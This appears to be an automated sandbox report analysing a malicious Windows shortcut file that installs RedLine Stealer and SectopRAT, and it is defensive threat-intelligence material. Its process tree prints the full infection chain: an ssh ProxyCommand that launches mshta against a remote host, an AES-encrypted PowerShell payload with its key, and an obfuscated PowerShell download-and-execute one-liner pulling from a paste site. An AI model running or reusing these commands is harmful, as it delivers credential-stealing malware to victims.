Edit tour

Windows Analysis Report
fsg5PWtTm2.lnk

Overview

General Information

Sample name:	fsg5PWtTm2.lnk renamed because original name is a hash value
Original sample name:	26db835c118e06564f8074656bc403862848cc3d0b3761625a07cb4f33790902.lnk.d.lnk
Analysis ID:	1576504
MD5:	3ad01b6c99c252f92d17473e8988ee2c
SHA1:	e47c28c2c573423016f2f799089c80491e4e12c4
SHA256:	26db835c118e06564f8074656bc403862848cc3d0b3761625a07cb4f33790902
Tags:	docu-signer-comlnkuser-JAMESWT_MHT
Infos:

Detection

RedLine, SectopRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Windows shortcut file (LNK) starts blacklisted processes

Yara detected RedLine Stealer

Yara detected SectopRAT

AI detected suspicious sample

Bypasses PowerShell execution policy

Connects to many ports of the same IP (likely port scanning)

Machine Learning detection for sample

Powershell drops PE file

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Uses known network protocols on non-standard ports

Windows shortcut file (LNK) contains suspicious command line arguments

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Lolbin Ssh.exe Use As Proxy

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: Use Short Name Path in Command Line

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

ssh.exe (PID: 6760 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57)" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)

conhost.exe (PID: 3468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7192 cmdline: powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57) MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)

mshta.exe (PID: 7444 cmdline: "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 7720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5E342E8B3007240FE11C37187542FAF44694BA243E75720F63DAC402F92D531741366BDB6322CF081331A805D7C393B10FE6A6618BA7FCC4E44DC5C3A47A515A78FD0681299AE510D773C4AE75FA31612D3D761D8F51CB984EE9FE20883C2574541CB70B38F08EBC3023844993DE3B2CEAA99C7009E715AEA59A5FD63088DABF3232B33A46C35A72875E7544BE0C19F8CB92CF266FDFA7ADB7450BB6B1BB5764CACC8A0D627027BDE338F15A2F8ECC5EBF9EE1C3D0F79E37CC3411BDB4D526BA177D7FF4D1ED20E9894CC6E2648DC8FC2D093F6902B74DB4734ED06D43D0FB6A059279B864CFB87D4BB1DEBA3231227EB853545F0719A82018CCF19D9DC57F3A1C53666C941C5B457CA531546D3B800353A592D337CEEBED25824ED14F551081B08B6BA4A2059BAB42CC76D64E04A6DA0B3F10A753DF0A78DF9ED54DF3ADA3FB5B2265878E42BD705E435684134A35F96363B352F4BC04C266C99E75BED507D7C90A66E95C9D579520DB850EBCA134E512948BA775D035F895CB164ECF18DE81BE0FB9A6FB1FE1420F36FEDE040D9AB9343D928AD528763A51983374934ECD28DFB3D1957EFD625A9446717760CC7DC939BF26E555C8F22289F0DBC19789B4959F856A76B0EB6B71198B98EAE2103527702F776A6E63EDC34DA4615FB6324C083EBA43C9F3D9194E7F3EB6E3690044935E9E945A043E06339A90CD5C082951401D1A63BA39BF680652F8989BF4CD69559249DC7898F06521B5D07DBF12FFD6CF71EFA8681D6FDAEDAD1262BED7933FACC9C1B8DE78D5DAB90DD2018854BA9AF7F4BD8927EC8B7F9C0774803B76F3B90447B63425D5B07CC834F49BD8D5DD26240C7A0953A10862584B0F1E4827E3C946EFF41E8284A4E4978A44245F4D8379F5A8105821871172D50BA89834B46C518229D1E0F0E4E77');$nJpn=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((CgMQB('484650636D48754D45634B49746F565A')),[byte[]]::new(16)).TransformFinalBlock($QBRr,0,$QBRr.Length)); & $nJpn.Substring(0,3) $nJpn.Substring(273) MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7844 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

updater.exe (PID: 2024 cmdline: "C:\Users\user~1\AppData\Local\Temp\27589682\updater.exe" C:\Users\user~1\AppData\Local\Temp\27589682\OWoDjWrI.dll MD5: C56B5F0201A3B3DE53E561FE76912BFD)

MSBuild.exe (PID: 5204 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

Acrobat.exe (PID: 6732 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\i1040gi.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 7276 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 336 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1680,i,7793574155390070799,18078941807343672542,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

svchost.exe (PID: 7648 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

AutoIt3.exe (PID: 5336 cmdline: "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x MD5: C56B5F0201A3B3DE53E561FE76912BFD)

MSBuild.exe (PID: 5924 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

AutoIt3.exe (PID: 5960 cmdline: "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x MD5: C56B5F0201A3B3DE53E561FE76912BFD)

MSBuild.exe (PID: 5780 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000001E.00000002.1869837031.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000002.1869837031.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000021.00000002.1950892133.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000002.1950892133.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001B.00000003.1700128947.0000000005BA4000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000003.1700128947.0000000005BA4000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001D.00000003.1869173897.0000000005C34000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000003.1869173897.0000000005C34000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000021.00000003.1945564458.0000000005DF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000003.1945564458.0000000005DF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001B.00000003.1699884150.0000000005E90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000003.1699884150.0000000005E90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000021.00000003.1946324487.0000000005B04000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000003.1946324487.0000000005B04000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001B.00000002.1705438253.0000000004C90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000002.1705438253.0000000004C90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001D.00000002.1872119594.0000000004D20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000002.1872119594.0000000004D20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001D.00000003.1868490019.0000000005F20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000003.1868490019.0000000005F20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: powershell.exe PID: 7720	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xadf5f:$b1: ::WriteAllBytes( 0xae94e:$b1: ::WriteAllBytes( 0xf5f60:$b1: ::WriteAllBytes( 0x1e8ca3:$b1: ::WriteAllBytes( 0x1e8d3b:$b1: ::WriteAllBytes( 0x1e8dd3:$b1: ::WriteAllBytes( 0x1ea750:$b1: ::WriteAllBytes( 0x1ea849:$b1: ::WriteAllBytes( 0x31aa2:$s1: -join 0x3eb77:$s1: -join 0x41f49:$s1: -join 0x425fb:$s1: -join 0x440ec:$s1: -join 0x462f2:$s1: -join 0x46b19:$s1: -join 0x47389:$s1: -join 0x47ac4:$s1: -join 0x47af6:$s1: -join 0x47b3e:$s1: -join 0x47b5d:$s1: -join 0x483ad:$s1: -join
Process Memory Space: updater.exe PID: 2024	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: updater.exe PID: 2024	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: updater.exe PID: 2024	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 5204	JoeSecurity_SectopRAT	Yara detected SectopRAT	Joe Security
Process Memory Space: AutoIt3.exe PID: 5336	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: AutoIt3.exe PID: 5336	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AutoIt3.exe PID: 5336	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 5924	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 5924	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: AutoIt3.exe PID: 5960	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: AutoIt3.exe PID: 5960	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AutoIt3.exe PID: 5960	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
27.2.updater.exe.4c96e70.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
27.2.updater.exe.4c96e70.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
27.2.updater.exe.4c96e70.1.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
30.2.MSBuild.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
30.2.MSBuild.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
30.2.MSBuild.exe.400000.0.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
33.3.AutoIt3.exe.5dc5d6c.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
33.3.AutoIt3.exe.5dc5d6c.0.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb9042:$s14: keybd_event 0xbfbb1:$v1_1: grabber@ 0xb9c14:$v1_2: <BrowserProfile>k__ 0xba68d:$v1_3: <SystemHardwares>k__ 0xba74c:$v1_5: <ScannedWallets>k__ 0xba7dc:$v1_6: <DicrFiles>k__ 0xba7b8:$v1_7: <MessageClientFiles>k__ 0xbab82:$v1_8: <ScanBrowsers>k__BackingField 0xbabd4:$v1_8: <ScanWallets>k__BackingField 0xbabf1:$v1_8: <ScanScreen>k__BackingField 0xbac2b:$v1_8: <ScanVPN>k__BackingField
29.2.AutoIt3.exe.4d26e70.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
29.2.AutoIt3.exe.4d26e70.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
29.2.AutoIt3.exe.4d26e70.1.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
29.2.AutoIt3.exe.4d26e70.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
29.2.AutoIt3.exe.4d26e70.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
29.2.AutoIt3.exe.4d26e70.1.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
33.2.AutoIt3.exe.4bf6e70.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
33.2.AutoIt3.exe.4bf6e70.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
33.2.AutoIt3.exe.4bf6e70.1.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
27.2.updater.exe.4c96e70.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
27.2.updater.exe.4c96e70.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
27.2.updater.exe.4c96e70.1.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
33.2.AutoIt3.exe.4bf6e70.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
33.2.AutoIt3.exe.4bf6e70.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
